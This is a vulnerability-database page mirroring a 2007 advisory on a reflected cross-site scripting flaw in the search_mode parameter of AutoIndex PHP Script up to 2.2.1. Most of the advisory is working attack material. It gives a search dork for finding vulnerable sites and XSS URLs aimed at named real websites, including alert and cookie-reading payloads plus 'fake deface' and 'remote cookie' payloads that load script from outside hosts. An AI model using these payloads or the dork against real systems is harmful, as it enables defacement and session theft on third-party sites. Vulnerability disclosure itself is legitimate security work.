Lucene search

K

autoindexXSS.txt

🗓️ 25 Aug 2007 00:00:00Reported by d3hrdr8Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

AutoIndex PHP Script search_mode Cross-Site Scripting Vulnerability in <= 2.2.1 version. Contact d3hydr8[at]gmail[dot]com for more info

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
# Title : AutoIndex PHP Script search_mode Cross-Site Scripting Vulnerability  
  
# Description : AutoIndex PHP Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.  
  
# Software : http://autoindex.sourceforge.net/  
  
# Vuln. Version : <= 2.2.1   
  
# Author : d3hydr8  
  
# Contact : d3hydr8[at]gmail[dot]com  
  
# Homepage : http://darkcode.h1x.com  
  
# Original Post : http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=243  
  
# Dork : intext:"Powered by AutoIndex PHP Script" or inurl:/AutoIndex/index.php  
  
# Greets : mozi, whoami, icqbomber  
  
# Proof :  
  
Simple Alert:  
http://www.flapjack.be/AutoIndex/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
http://www.projectopensky.com/files/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
http://scizz.com/rhtools/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
  
Fake Deface:  
http://buraaq.net/AutoIndex/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E  
  
http://archsymb.com/ruby/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E  
  
cookie:  
http://boxorroxors.net/downloads.php?search=asdf&search_mode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
remote cookie:  
http://tor.meulie.net/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3   
  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo